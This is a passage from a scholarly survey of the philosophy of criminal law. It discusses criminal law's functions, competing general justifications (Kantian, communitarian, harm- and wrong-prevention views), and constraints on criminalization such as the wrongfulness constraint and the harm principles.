Those who reject the communitarian view might be thought to face the following difficulty: they might be thought to lack an explanation of official control over how far criminal proceedings go. If criminal law seeks what is owed by wrongdoers to the wronged, doesn’t official control amount to theft of a conflict properly controlled by the two parties (Christie 1977)? Not necessarily. First, we should not always require the wronged to have to pursue those who have wronged them. Second, we should not always support those who think themselves wronged in pursuing alleged wrongdoers. As to the first point, some are trapped in abusive relationships with those who wrong them. Others are susceptible to manipulation that serves to silence their complaints. Some wrongdoers can use wealth and social status to stop accusers in their tracks. As to the second point, the temptation to retaliate in the face of wrongdoing is often great. It is all too easy for the pursuit of justice to become the pursuit of revenge, and for the perceived urgency of the pursuit to generate false accusations. Official control can help vulnerable individuals—like those described above—to get what they are owed. And it can mitigate the damage done by those trying to exact vengeance and settle scores (Gardner 2007, 214–216). It can ensure that those in positions of power cannot wrong others with impunity, and reduce the likelihood that vindictiveness begets retaliation, which begets violent conflict from which all lose out (Wellman 2005, 8–10). We can add that criminal proceedings may help protect others against being wronged in future. Those wronged may have a duty to give up control of proceedings in order to provide this protection (Tadros 2011c, 297–299).
These remarks suggest an alternative to the communitarian view. According to the alternative, the secondary duties of concern in civil and criminal proceedings are typically one and the same. The positive case for criminal law’s involvement is not that it discharges duties of interest to the criminal law alone, but that it enables duties of general interest to be discharged less imperfectly than they otherwise would be—than they would be if the criminal law took no interest in them. Call this the imperfectionist view. What is distinctive of criminal law, on this view, is not its function but its mode of functioning: the manner in which it fulfills functions shared with other bodies of law.
Some writers seek criminal law’s distinctiveness in a different place. What is distinctive about criminal law, they claim, is that it publicly censures or condemns. This expressive function is sometimes associated with criminal punishment (Husak 2008, 92–95). Because other bodies of law sometimes punish, and because punishment typically—perhaps necessarily—expresses censure (Feinberg 1970), the expressive function is at least partly shared. But the message sent by criminal law is not sent only at the sentencing stage. It is sent the moment a guilty verdict is reached by a criminal court—by the declaration that \(D\) has been criminally convicted (Simester 2005, 33–36). The social significance of conviction is very different to that of (say) the verdict that \(D\) is a tortfeasor: the former verdict conveys, in and of itself, that \(D\)’s conduct reflects badly on \(D\). Though additional detail may generate the same conclusion in the case of a civil verdict, such detail is not required in the case of criminal conviction. If this is right, the distinctiveness of criminal law turns out not to consist in the fact that it provides for punishment. It turns out to consist (at least in part) in the provision of a technique for condemning wrongdoers which does not require that we punish in order to condemn.
So far, we have focused on the functions criminal law fulfills in response to the commission of crime. It is plausible to think, however, that criminal law’s functions include preventing crime from occurring. We can see this by asking what success would look like for the criminal law. Would criminal law have succeeded if all thieves and murderers were tried and punished? Or would it have succeeded if there was no theft or murder, because criminalization resulted in would-be thieves and murderers refraining from such wrongs? Notice that to pose these two questions as alternatives is not to deny that punishment might be justified in preventive terms. It is rather to suggest that resorting to punishment to achieve prevention is already a partial failure for the criminal law. It is a failure to deter those who, ex hypothesi, have already committed criminal offences. Had the creation of those offences been an unqualified success, there would have been nothing for which to punish anyone.
One might hold that criminal law’s sole function is to prevent criminal wrongdoing. Call this the preventive view. Defenders of this view need not say that we should enact whatever laws will achieve the most prevention. That \(X\) is the function of \(Y\) does not entail that we are justified in doing whatever will achieve most of \(X\) with \(Y\). That cutting is the function of knives does not entail that knife-holders are justified in cutting whatever they see. Holders of the preventive view can, in other words, accept the existence of constraints on prevention, that are not themselves justified in preventive terms (Hart 1968, 35–50). What they cannot accept is a positive case for criminal law that is not preventive.
Some hold a mixed view that combines elements of those considered above (Alexander and Ferzan 2009, 3–19; Simester and von Hirsch 2011, 3–18; Tadros 2016, 159–172). One way to construct such a view is by distinguishing between primary and secondary functions. Primary functions are those that, when all else is equal, we have most reason to want the law to fulfil. Secondary functions are those we have reason to want the law to fulfil if it fails to fulfil its primary functions. Criminal law’s primary functions, it is plausible to think, are preventive. Ceteris paribus, we have most reason to want criminal law to bring about a world in which wrongs like theft or murder do not occur. Failing that, we have reason to want criminal law to call thieves and murderers to account, and to punish those who have no adequate account to offer.
There is some scepticism about mixed views. For some, the worries are conceptual. Moore claims that justified punishment must be imposed for reasons of desert, and that for this reason the punitive and preventive functions cannot be combined. We are unable to ‘kill two birds with the proverbial one stone, for by aiming at one of the birds we will necessarily miss the other’ (Moore 1997, 28). Several replies are available. First, even if this is a problem for a mixed view of punishment, it need not be for a mixed view of criminal law. Grant that punishment must be imposed for reasons of desert. It does not follow that criminal offences cannot be created for reasons of prevention. Criminalization and punishment are different acts, and can be performed for different reasons (Edwards and Simester 2014). Second, to claim that \(X\) is part of the positive case for criminal law—that it is one of criminal law’s functions—is not to claim that \(X\) should be part of the mission of every criminal justice official (Gardner 2007, 202). Reasons that help make a positive case for our actions are often reasons for which we should not act. That one will be financially secure is a reason to get married, but one should not get married in order to be financially secure. Similarly, to say that prevention helps make a positive case for criminal law—and for punishment—is not to say that judges should punish for that reason.
Other worries about mixed views are pragmatic (Duff 2010a). As criminal wrongdoing will persist whatever we do, the preventive function sets criminal law an insatiable goal. There is a standing risk that law-makers who pursue that goal will deprive us of a criminal law that fulfills its other functions. Consider again the curial view. Plausibly, we have reason to account for wrongs like theft and fraud in criminal court, but no reason to account for every interaction with property or all misleading statements from which we stand to gain. If defendants are to be called to account for the wrongs, it is these that must be criminalized. To criminalize trivialities—in pursuit of preventive ends—is to drain criminal proceedings of their intrinsic value (Duff 2010b). No doubt these are important worries. But they do nothing to suggest that we should reject a mixed view. At most, they show that law-makers also should not take prevention to be part of their mission. As we already saw, this conclusion does not show that prevention is not part of the positive case for criminal law. And it may anyway be too strong. Law-makers who exclude prevention from their mission may refuse to create crimes that would prevent a great deal of harm. The cost of refusing to create these crimes might be greater than the cost of calling people to account for trivialities, and this might be so even when alternative means of prevention are factored in. If it would, criminal law’s preventive function should be part of the law-making mission: it is a function law-makers should indeed aim to fulfil.
3. Justifications of Criminal Law
In light of the resources it consumes, and the damage it does to people’s lives, it is far from clear that we are justified in having criminal law. If we should not be abolitionists, criminal law must be capable of realizing some value that gives us sufficient reason to retain it. To offer an account of this value is to offer a general justification of criminal law. Obviously enough, the functions of criminal law tell us something about what this might be. If the punitive view is correct, criminal law’s value consists in delivering justified punishment. If the curial view is correct, that value consists (in part) in people offering answers that they have reason to offer. If the preventive view is correct, it consists in preventing criminal wrongs. So stated, however, these views do not tell us what the value of fulfilling each function actually is. The punitive view tells us nothing about what justifies criminal punishment. The curial view tells us nothing about the value of calling people to account in criminal courts. The preventive view tells us nothing about the value of preventing crime. A general justification of criminal law fills this explanatory gap.
We can make progress by distinguishing between value of different kinds. Some value is relational—it exists in virtue of relationships in which people stand. That a relationship has such value is a reason to do what will bring it into existence. The value of friendship is a reason to make friends. The value of egalitarian social relations is a reason to break down barriers of status and rank. Some argue that we have sufficient reason to have criminal law because it helps us enter a valuable relationship: it helps transform our relations with one another from relations of mutual dependence, to relations of independence from the power of others (Ripstein 2009, 300–324; Thorburn 2011a, 2011b).
This argument can be developed as follows. Just as slaves are dependent on their masters, so we are dependent on one another in the absence of a framework of legal rights: just as masters wrong their slaves, however well they treat them, so we are doomed to wrong one another if no such framework exists. To avoid this, we need more than just rights that exist on paper. We need sufficient assurance that our rights will be respected, and we need a mechanism by which their supremacy can be reasserted in the face of wilful violation. Criminal law’s value lies in giving us what we need. Criminal punishment amounts to reassertion. Crime prevention provides reassurance. At the level of function, this is what the last section called a mixed view. But the value of fulfilling both functions is one and the same: it is the value of securing our independence from one another, so we cease to relate to one another as master and slave, and begin to do so as independent beings. As it is often associated (rightly or wrongly) with Kant’s political philosophy, we can call this the Kantian view.
It is sometimes suggested that criminal law’s general justification is exhausted by its contribution to our independence. It is not clear why we should accept this claim. One source of doubt is the fact that some agents are unavoidably dependent—they lack the capacities required to live as independent beings. This is true of some non-human animals, and some of those with serious disabilities. Precisely because of the capacities they lack, these agents are especially vulnerable to being abused or exploited. Part of criminal law’s general justification is that it protects the vulnerable against such wrongs. Ex hypothesi, this does nothing to secure independence. So it is not something that can be accommodated by (the exhaustive form of) the Kantian view (Tadros 2011b).
For defenders of the Kantian view, criminal law’s value derives from a relationship it helps create. On another view, the value of criminal law derives from a relationship that pre-exists it: the relationship in which we stand as members of a political community (Duff 2011). Any such community has values in terms of which it is understood by its members. If this self-understanding is to be more than a charade, the community must actually value its defining values—it must do what those values are reasons to do. Imagine that life is one such value, and a member takes another’s life. Part of what it is for a community to value life is for it to respond to the taking: for the killer to be required to account to fellow members, thereby communicating the community’s judgment that the killing was wrong. Criminal law is a body of law that requires the accounting. Functionally, this is a version of the curial view. But the value of fulfilling that function is relational: it is the value of making the community one that is true to itself—one that does not betray the values in terms of which members understand what it is and who they are (Duff and Marshall 2010, 83–84). This line of thought lends support to what I earlier called the communitarian view. On that view, criminal proceedings discharge secondary duties owed to the community as a whole. That such duties are part and parcel of a valuable form of relationship helps explains why we should think that they exist.
One objection to the view described in the previous paragraph is that it is unduly conservative. What justifies criminalizing a wrong—on that view—is that the wrong has a pre-existing foothold in the defining values of the community: it is because of that foothold that failing to criminalize would be a form of self-betrayal. Some communities, however, are characterised by systematic neglect of important values—by patriarchy, or racism, or distributive inequality. When this is so, part of the justification for criminalization is not that it helps the community remain true to itself, but that it helps transform the community by reconstituting it in valuable ways (Dempsey 2009; 2011). One source of criminal law’s value, on this alternative view, is its ability to help alter social morality, such that neglected values come to be taken seriously by community members (Green 2013a). Where this is successful, criminal law can largely disappear from members’ motivational horizons: we come to refrain from conduct for the moral reasons that make it wrong, without reference to the fact that the conduct is criminal.
Both versions of the relational view—Kantian and communitarian—face another doubt. Imagine \(D\) robs \(V\). It is plausible to think that this wrong is of concern to the criminal law in its own right. It is plausible to think that whatever further effects it might have, preventing the wrong of murder itself helps justify criminalizing murder, and bringing criminal proceedings against murderers. On both the Kantian and communitarian views this is not the case. What justifies criminalizing wrongs, and bringing criminal proceedings against wrongdoers, is that this contributes to some larger social good—to the framework of legal rules we need for independence, or to the community remaining true to itself. We may reasonably doubt that wrongs like murder matter to the criminal law only for these further reasons. In claiming that this is why they matter, both versions of the relational view instrumentalize criminal law’s concern with wrongdoing: both hold that we have reason to prevent wrongs via the criminal law only because this is a means of establishing healthy relations in which all share.
The above remarks concern the kind of value that justifies having criminal law. We can also ask who is capable of realizing that value. On both the views sketched above, criminal law’s value is grounded in a relationship in which all stand. If that value is to be realised, someone must act on behalf of those who stand in the relationship. In most systems of criminal law, the job is done by the state—agents of the state create, apply, and enforce criminal laws. Some argue that in a legitimate system of criminal law this is the only possibility. Criminal law’s value, it is claimed, is essentially public—it is value that can only be realised, even in principle, by agents of the state. This view can be developed in a number of ways. Consider again the Kantian view. Some claim that coercion secures independence only if the coercer speaks for all those coerced. Otherwise it is just another independence violation. Only state agents can speak for all of us. So the enforcement of the criminal law must remain in their hands (Thorburn 2011a, 98–99). Defenders of the communitarian view tell a similar story. If the value of criminal proceedings is that they express the community’s judgment about wrongdoing, and if only state agents can convey our collective judgment, trials must be carried out, and punishments imposed, by those agents (Duff 2013a, 206). On both views, it is impossible for private persons to realise the values that justify criminal law. If these arguments go through, they have obvious implications for debates about the privatization of prison and police services (Dorfman and Harel 2016). They also offer us a sense in which criminal law theory must be political. It must face up to the question of whether there are essentially public goods, and ask what role they play in justifying the existence of criminal law (Harel 2014, 96–99).
Some find criminal law’s general justification in value that is neither relational nor essentially public. Consider the prevention of harm, or the prevention of moral wrongdoing. A number of writers appeal to one or both values to justify the existence of criminal law (Feinberg 1987, 146–155; Alexander and Ferzan 2009, 17; Simester and von Hirsch 2011, 29–30). Because there are wrongless harms (think of sporting injures caused without foul play) and harmless wrongs (think of botched conspiracies or undiscovered attempts) the aforementioned values do not always wax and wane together. One possibility is that criminal law’s concern with wrongs is derivative of its concern with harms: criminal law should prevent wrongs (e.g., conspiracy to injure) when and because harm is thereby prevented (e.g., injury itself). Another possibility is that criminal law’s concern with harms is derivative of its concern with wrongs: criminal law should prevent harms (e.g., physical injury) when and because those harms are wrongfully caused (e.g., by assault) (Feinberg 1987, 151–155; Moore 1997, 647–649). A third possibility is that harms and wrongs provide two independent sources of general justification (compare Tadros 2016, 162–166). Whatever the answer, this preventive value is impersonal in two ways: it is not grounded in any special relationship; and it is value that might in principle be realised by any of us.
Anyone who seeks criminal law’s justification in the coin of impersonal value must also account for what the criminal law does when prevention fails. Imagine \(D\) assaults \(V\), thereby causing \(V\) physical injury. Some claim that \(D\) thereby incurs secondary moral duties, not in virtue of any relationship in which \(D\) stands, but simply in virtue of facts about the wrong \(D\) committed (Moore 1997, 170–172; Tadros 2011c, 275–283). Criminal law’s responses to crime discharge these duties, it is claimed, and this is what justifies those responses.
It is worth distinguishing between two versions of this view. According to Moore, all culpable wrongdoers incur a duty to allow themselves to suffer. Retributive justice is done when punishment imposes that suffering, and this is what justifies the imposition of criminal punishment (Moore 1997, 70–71). Moore argues that the suffering of culpable wrongdoers is intrinsically good. On a rival view, suffering is always intrinsically bad. We must accept, however, that in some cases not all suffering can be avoided. Sometimes we must choose between wrongdoers suffering now and others suffering at the hands of wrongdoers later. Only by imposing the former can we protect against the latter. It might look as though punishing wrongdoers for these protective reasons amounts to treating them as mere means. But this is not necessarily so. Tadros argues that some wrongdoers incur duties to protect others at the cost of some harm to themselves. We can justify imposing punishments that come at this cost to these wrongdoers, when the punishments protect others by preventing future wrongs. As those punished are only doing their duty, we can reasonably claim that they are not treated as mere means (Tadros 2011c; 2016). Though Moore and Tadros disagree on many things, their views also have something in common. Both claim that, as a matter of principle, anyone might impose punishment that discharges wrongdoers’ secondary duties. The value to which both appeal to justify punishment is impersonal: it is neither relational nor essentially public (Moore 2009a, 42; Tadros 2011c, 293).
General justifications of criminal law like those sketched in the last few paragraphs face a number of criticisms. One objection has it they are unduly expansive: much moral wrongdoing—even much that generates secondary duties to suffer or protect—is no business of the criminal law. Failing to help one’s friend move house because one is lazy is a culpable wrong. But as the failure is a private matter—to be resolved by the friends themselves—there is no reason for law-makers to criminalize the wrong (Duff 2014b; Husak 2014, 215–216). There is certainly no reason for them to criminalize it when the friends are both citizens of another state, and the failure occurs in the other jurisdiction (Duff 2016). Reasons to criminalize exist, as it is often put, only where law-makers have standing. And the mere fact that a wrong generates the aforementioned secondary duties does not itself give law-makers standing to criminalize it.
According to a second objection, the focus on moral wrongdoing is unduly restrictive: much that is not morally wrong—and which generates no secondary duties—is the business of the criminal law. According to one argument for this conclusion, the stable existence of (almost) any valuable social institution—be it financial, educational, familial, military, or political—depends on widespread compliance with its rules. Under realistic conditions, criminal liability for violation is necessary for stability. It is the value of stable institutions, not the moral wrongfulness of violating their rules, that justifies bringing criminal law into existence (Chiao 2016).
A third objection returns us to the asymmetry discussed at the end of section 1. Many of the powers and permissions by means of which criminal justice is done are withheld from private persons. Most obviously, private persons are not typically permitted to use force to punish others for crime. Few think that this should be changed. Vigilantism should remain criminal. If the values that justify having criminal law are essentially public, we appear to have an easy explanation of this fact: private persons cannot, even in principle, realise the values that justify criminal punishment; so they should not be permitted to punish. If those values are not essentially public, things are more difficult. There will surely be cases in which private persons are best placed to discharge \(D\)’s secondary duties—in which the state will not punish \(D\), but our imagined moot court would fine \(D\) a proportionate amount. It is not immediately clear that those who find criminal law’s general justification in impersonal values can explain why the moot court may not extract the money (Thorburn 2011a, 92–93).
Let us take the third objection first. If impersonal values justify having criminal law, we have reason to opt for whichever set of legal rules will realise those values most efficiently. If one set of powers and permissions will achieve more of the value in question at a lower cost, we should—all else being equal—opt for that set. Now compare two sets of rules. One permits state officials and private persons alike to use force to punish criminals. Another withholds the permissions granted to the former from the latter. We have good reason to think that the first set of rules would bring with it significant costs. Private persons are likely to make more mistakes about who committed crimes, and about how much punishment is appropriate for criminality. Different private punishers are unlikely to punish similarly placed offenders in similar amounts. And as their actions are less easily subjected to public scrutiny, private persons are less easily compelled to punish for the right reasons—in order to do justice rather than settle scores, get revenge, or maximise their profit margins (Moore 2009a, 42; Edwards forthcoming). Avoiding these costs is a strong reason to opt for the second set of rules. True, that set prevents proportionate punishment being imposed by our imagined moot court. But it is plausible to think that this benefit is outweighed by the aforementioned costs. If it is, those who appeal to impersonal values to justify criminal law can explain why the moot court is not permitted to force us to give up our money.
According to the second objection, what justifies having criminal law is its role in stabilizing valuable institutions. Notice, however, that if violating the rules of a valuable institution contributes to its destabilization, we will often have a moral duty to conform to the institution’s rules. By preventing these wrongs, and holding wrongdoers responsible, we stabilize the institutions. The contrast between a general justification focused on moral wrongdoing, and one focused on institutional stability, therefore turns out to be a false contrast (Tadros 2016, 135). These observations help make a more general point. We can accept that criminal law is a tool properly used to support financial, educational, familial, military, and political institutions. We can also accept that it is not any old tool—that criminal law is ‘a great moral machine, stamping stigmata on its products, painfully “rubbing in” moral judgments on the people who entered at one end as “suspects” and emerged from the other end as condemned prisoners’ (Feinberg 1987, 155). It is precisely because criminal law is a tool of this special kind—a ‘morally loaded sledgehammer’ (Simester and von Hirsch 2011, 10)—that its general justification is plausibly found in preventing and responding to moral wrongs (cf. Tadros 2016, 68–70).
If this kind of general justification is not too restrictive, is it nonetheless too expansive? This was the first of the three objections raised above. Let us grant that some moral wrongs are not the criminal law’s business. We need not infer that criminal law is unconcerned with moral wrongness. We need only accept that there are facts about criminalization which give law-makers a duty not to criminalize some moral wrongs. There are many such facts, and their force varies depending on the wrong (Simester and von Hirsch 2011, 189–211; Moore 2014). In some cases, criminalizing a wrong will inevitably result in selective enforcement, raising concerns about selection being made on discriminatory grounds. In others, enforcement would necessitate gross invasions of privacy, and require the law to take sides in conflicts better resolved by the parties themselves. There is often value in freely choosing not to act wrongly, and in so choosing for the right reasons, rather than because one was coerced: criminalizing a wrong may result in this value disappearing from the world. It will almost inevitably divert scarce resources from other valuable priorities. And there is often reason to think that criminalization will not result in there being less wrongdoing in the world. Criminal conduct may be driven underground rather than made less common. Institutions of punishment may house unseen abuse and victimization. Ex-offenders may be driven towards crime by their reduced prospects in life. Where reasons like these generate a duty not to criminalize a wrong, the conduct in question is no business of the criminal law. There is nothing here to cast doubt on the thought that criminal law’s general justification consists in preventing, and holding people responsible for, moral wrongs.
4. The Limits of Criminal Law
No-one denies that some things should not be criminalized. What is less clear is how we are to work out what these things are. One approach is to seek constraints on permissible criminalization. Even if the values that justify having criminal law count in favour of criminalization, our reasons to do so may be defeated by reasons that count against. A constraint identifies conditions under which the latter reasons always win. Consider, for example, the wrongfulness constraint:
- It is only permissible to criminalize \(\phi\)ing if \(\phi\)ing is morally wrongful conduct.
Principles like (W) give us a line we can draw without reference to (at least some) morally salient particulars. Conduct that falls outside the line may not be criminalized come what may. Imagine we are considering whether to make it a crime to possess guns. Doing so will prevent a great deal of harmful wrongdoing that cannot be prevented otherwise. This is a powerful moral reason to criminalize. But if (W) is sound, and gun possession is not morally wrongful, that powerful reason is irrelevant to the decision with which we are faced. We are not permitted to criminalize, however much harm criminalization would prevent (Moore 1997, 72–73; Simester and von Hirsch 2011, 22–23; Duff 2014b, 218–222).
Some suspect that all purported constraints on criminalization fail (Duff et al 2014, 44–52; Tadros 2016, 91–107). This is not to say that anything goes. It is rather to say that we cannot use a line like that drawn by (W) to work out what is permissibly criminalized. To trace the limits of the criminal law, we must engage in a more complex normative exercise: we must consider all morally salient particulars of proposed criminal laws—giving those particulars due weight in our deliberations—and thereby determine whether each proposal should be enacted. The limits of the criminal law cannot be traced in advance of this exercise. Instead, they are determined by it.
The constraint to which most attention has been paid is the so-called harm principle. It is nowadays widely recognised that there is no single such principle. Rather, there are many harm principles (Tadros 2011a; Tomlin 2014b; Edwards 2014). One important distinction is between the harmful conduct principle (HCP) and the harm prevention principle (HPP):
- It is only permissible to criminalize \(\phi\)ing if \(\phi\)ing is harmful conduct, or conduct that unreasonably risks harm.
- It is only permissible to criminalize \(\phi\)ing if criminalizing \(\phi\)ing is necessary to prevent harm, and if the harm done by criminalization is not disproportionate to the harm prevented.
These principles have very different implications. That conduct is harmful, or unreasonably risks harm, does not show that we will prevent a proportionate amount of harm by criminalizing it. Conversely, we may be able to prevent harm only by criminalizing conduct that is harmless, and that does not unreasonably risk harm.
To see the first point, consider the use of drugs. Criminalizing use may turn a drug into forbidden fruit that is more attractive to potential consumers, and place production in the hands of criminal gangs who make consumption ever more harmful. Users may become less willing to seek medical treatment for fear of exposing their criminality, and may end up with criminal records that lead to social exclusion, and damage their employment prospects for years to come (United Nations 2015). Where criminalization does have these effects, the harm it does is out of all proportion to any harm prevented. Even if (HCP) is satisfied, (HPP) is not.
To see the second point, consider the possession of guns. Possessing a gun is not itself harmful. And many possess guns without unreasonably risking harm. If one endorses (HCP), one must either weaken one’s chosen principle or accept that gun possession cannot be criminalized. If one endorses (HPP), things are different. What matters is not the effect of each instance of gun possession, but the effect of criminalizing all of them: if criminalizing possession will prevent harm that would not otherwise be prevented—and do so at a not disproportionate cost—the fact that some owners possess guns safely is beside the point. Whether or not (HCP) is satisfied, (HPP) is.
Constraints like (W), (HCP), and (HPP) require clarification. To apply (W) we need to know what makes something morally wrongful. Plausibly enough, it is morally wrongful to \(\phi\) only if there is decisive reason not to \(\phi\). But while this is necessary, it may not be sufficient. I have decisive reason not to go out in the rain without my umbrella. But it does not seem morally wrongful to do so (Tadros 2016, 11–46). Whatever the correct criterion, we must ask how law-makers are to apply it. Are law-makers to ask whether most members of society believe \(\phi\)ing to be morally wrongful—a matter of conventional morality—or are they to ask whether this is what members would ideally believe—a matter of critical morality (Hart 1963; Devlin 1965)? We must also ask whether just any morally wrongful act will do. Some wrongful acts also violate rights, such that those who commit them wrong others. On one view, it is only when \(\phi\)ing meets this additional test that it is permissible to criminalize \(\phi\)ing (Feinberg 1984; Stewart 2010).
Some crimes are mala in se—they criminalize conduct that is morally wrongful independently of the law. Most crimes are mala prohibita—they criminalize conduct that, if morally wrongful at all, is morally wrongful partly in virtue of the fact that it is unlawful. Is (W) compatible with the existence of mala prohibita? That depends on the extent to which changes in the law can produce changes in morality. The rules of the road are the classic case. Apart from the law, it is morally wrongful to drive dangerously. Such conduct is malum in se. What we should do to conform to this moral norm is not always obvious. To help, the law puts in place rules that tell us which side of the road to drive on, when to stop, and how fast we may go. Imagine we obey these rules. In doing so, we drive more safely than we otherwise would have: we better conform to the moral norm that prohibits dangerous driving. One proposal is that it is morally wrongful to violate legal norms that have this effect: that help us better conform to moral norms that exist independently of the law (Gardner 2011, 19–21). Mala prohibita of this kind would then be compatible with (W). Of course, things are not so straightforward. Even if legal conformity generally improves our moral conformity, there may be exceptional cases in which it does not—in which we can violate the rules of the road without putting anyone in danger, or in which violation helps keep everyone safe. And there may be people for whom even the generalization is not true—whose expertise enables them to systematically violate legal norms without creating risks any greater than those created by the rest of us. Can an explanation be given of why these violations are nonetheless morally wrongful? If not, (W) implies that even morally beneficial mala prohibita—like the rules of the road—must ultimately be removed from the criminal law (Husak 2008, 103–119; Simester and von Hirsch 2011, 24–29; Wellman 2013).
To apply (HCP) and (HPP) we need a conception of harm. Most views are comparative: we are harmed by some event if and only if that event renders us worse off in some way relative to some baseline. One challenge is to identify the relevant baseline. Are we harmed by an event if we are worse than we would have been if things had been different? If so, different how? Are we harmed if we are worse off than we were immediately beforehand? Or should we focus not on the position we were or would have been in, but on the position we should have been in morally speaking (Holtug 2002; Tadros 2016, 187–200)? A second challenge is to determine in what way we must be worse off. The wider our answer to this question, the more likely it is that harm principles collapse into their supposed rivals. Some say we are harmed when our interests are set back (Feinberg 1984, 31–64). But it is plausible to think that we have interests in avoiding disgust, annoyance, and dismay. Many people are disgusted, annoyed, or dismayed by what they take to be morally wrongful. On an interest-based view, they are also harmed. Any harm principle that uses this notion of harm thus threatens to permit criminalization of much conventional immorality (Devlin 1965). A narrower view has it that we are harmed only if our future prospects are reduced, because we are deprived of valuable abilities or opportunities (Raz 1986, 413–414; Gardner 2007, 3–4; Simester and von Hirsch 2011, 36–37). Disgust, annoyance, and offence need not—and often do not—have this effect. So they need not be—and often are not—harmful. But as blinding pain also need not reduce one’s prospects in life, it is arguable that this view avoids collapse only at the cost of underinclusion (Tadros 2016, 179–180).
Whatever view of harm we take, we must also decide whether all harms count for the purposes of a given harm principle. People sometimes harm themselves, they are sometimes harmed by natural events, and harm is sometimes done consensually. Recall that if we endorse (HPP), we must decide whether the harm criminalization prevents is proportionate to the harm it does. Can we include all the aforementioned harms in our calculations? Or must we only include harm done to others without their consent (Mill 1859; Dworkin 1972; Feinberg 1986; Coons and Weber 2013)? Some point out that whatever law-makers’ aims, most criminal laws will prevent some non-consensual harm (Feinberg 1986, 138–142; Tadros 2016, 103). Be that as it may, whether we take into account other harms remains important: where the scales would otherwise point against criminalization, giving weight to a wider range of harms may tip the balance decisively in its favour.
As well as asking how constraints might be clarified, we must ask how they might be defended. One type of defence proceeds from within our theory of ideals. A theory of ideals includes an account of the values that bear upon how we should act, and of the priority relations between those values (Hamlin and Stemplowska 2012). To see how such a theory might generate constraints, consider (W). One argument for that principle is the argument from conviction (Simester and von Hirsch 2011, 19–20):
- To criminally convict \(D\) of \(\phi\)ing is to censure \(D\) for having \(\phi\)ed;
- To censure \(D\) for having \(\phi\)ed is to convey that \(D\)’s \(\phi\)ing was morally wrongful;
- It is morally defamatory to send false messages about the moral status of \(D\)’s conduct;
- It is impermissible to criminalize conduct that is not morally wrongful.
A second argument is the argument from punishment (Husak 2008, 92–103):
- To criminally punish \(D\) is to intentionally harm \(D\), and expose \(D\) to social stigma;
- We have a right not to be intentionally harmed in a way that exposes us to such stigma;
- That right is permissibly infringed only if we are punished for wrongful conduct;
- It is impermissible to criminalize conduct that is not morally wrongful.
One response to these arguments is that criminal law does not always censure or stigmatize. Another is that the arguments rely on priority claims that cannot be sustained. The argument from conviction depends on our accepting that moral defamation cannot be justified. The argument from punishment depends on our accepting that those who do not act wrongly have an absolute right not to be punished. These claims may be too strong. To test the second, think again about possession of guns. Imagine that we criminalize possession, and that we have good reason to think that we can thereby save many lives. \(D\) possesses a gun safely because \(D\) likes how it looks hanging on the wall. We can grant that \(D\) would act wrongly if \(D\)’s conduct risked harm to others, or prevented the state from saving others’ lives. But as \(D\)’s possession is safe, and the state has in fact criminalized possession, neither is the case. Would the state violate \(D\)’s rights if it punished \(D\)? It is plausible to think not. \(D\) could very easily have refrained from possessing the gun. And if the state were to refrain from punishing safe possessors like \(D\), more people would be likely to possess guns in the mistaken belief that this was safe. This would likely result in some lives being lost. The fact that not punishing safe possessors would probably have this effect is a good reason to think that safe possessors lack a valid complaint if they are punished. It is a good reason to think that it sometimes is permissible to punish the morally innocent. If it is, premise (3) of the argument from punishment is false (Tadros 2016, 329–333).
Now consider (HPP). We can imagine a world in which we could flick a switch, sending an electronic signal to \(D\)’s brain, the only effect of which would be that \(D\) would not act wrongly. Whatever one thinks of this means of prevention, it is not the means we utilize when we make use of criminal law. Absent perfect compliance, criminal law prevents wrongs by publicly making accusations, condemning people as wrongdoers, and punishing them for their wrongs. Public accusations often stick even if nothing comes of them. Punishment is harmful by its very nature. The lives of \(D\)’s family and friends are collateral damage as \(D\)’s prospects are reduced. Some claim that we can justify causing such harm—at least when the state does the harming—only if this is a necessary and proportionate means of preventing people being harmed. So it is impermissible to criminalize when this condition is not satisfied. Hence (HPP) (Raz 1986, 418–420; Edwards 2014, 259–262).
One might reply that the harm internal to justified punishment is harm we lack reason not to impose. Leaving this aside, it is far from obvious that harm has lexical priority over other values. The above argument for (HPP) seems to depend on this claim. But there is wrongdoing that is both serious and harmless. Imagine \(D\) violates the bodily integrity or sexual autonomy of an unconscious \(V\), but this is never discovered and has no further effects (Gardner and Shute 2000; Ripstein 2006, 218–229). It is plausible to think that the value of preventing such wrongs, even when this does not prevent harm, is at least sometimes capable of justifying the harm done by criminalization (Tadros 2016, 106–107).
A second defence of constraints proceeds from within non-ideal theory: from our account of what should be done when some people will not act as they should. One might say that all criminal law theory is part of non-ideal theory—that we have reason to have criminal law precisely because people will (otherwise) act wrongly. Be that as it may. As well as fallible agents who (would otherwise) commit crimes, there are fallible agents who make, apply, and enforce criminal laws. Any non-ideal theory must also take account of the errors the latter are disposed to make. Some are errors of application and enforcement—errors made when police officers arrest, prosecutors charge, and courts punish the innocent. More important for present purposes are the errors law-makers are disposed to make when creating crimes. These errors matter here for the following reason. Prescriptive norms are often justified on the grounds that they prevent/mitigate errors that would be made in their absence (Schauer 1991, 135–166). If followed, speed limits prevent some drivers from driving in ways that are impeccable in isolation. But the limits are justified if they prevent/mitigate errors that drivers would make if we did without speed limits, and if preventing/mitigating the errors is worth the cost of preventing some driving that is otherwise impeccable. Let us grant that, when followed, constraints like (W) or (HPP) prevent some law-makers from criminalizing in ways that are impeccable in isolation. The constraints may be justified if they prevent/mitigate errors law-makers would make if they did without them, and if preventing/mitigating the errors is worth the cost of preventing criminalization that is otherwise impeccable.
Many defenders of (HPP) offer defences that proceed in the manner just described. One error is that of underestimating the value in lives very different from our own: of mistaking the virtues required to succeed in those lives for vices, and of concluding that these supposed vices ought to be suppressed (Raz 1986, 401–407; Gardner 2007, 118–120). A second error is that of underestimating the value of toleration. That value includes making space for experiments in living, which both help combat prejudice by exposing people to the unfamiliar, and help people develop deliberative faculties by exposing them to that with which they disagree (Mill 1859; Brink 2013). A third error is that of underestimating the harm one’s policies do to those who live in very different circumstances (Green 2013b, 202). If the main effects of criminalizing drug use are felt in communities the affluent shun, it is not hard to see how law-makers could be blind to the amount of damage criminalization does. Law-makers who make each of these errors will be tempted to create criminal laws that are anything but impeccable—laws designed to suppress activities the value in which has been missed, which do much more harm than their designers anticipated. The case for (HPP) is that it stands in the way of this temptation. Those who follow it must tolerate conduct—however offensive or immoral they deem it to be—unless they can show that criminalization is a necessary and proportionate means of preventing harm.
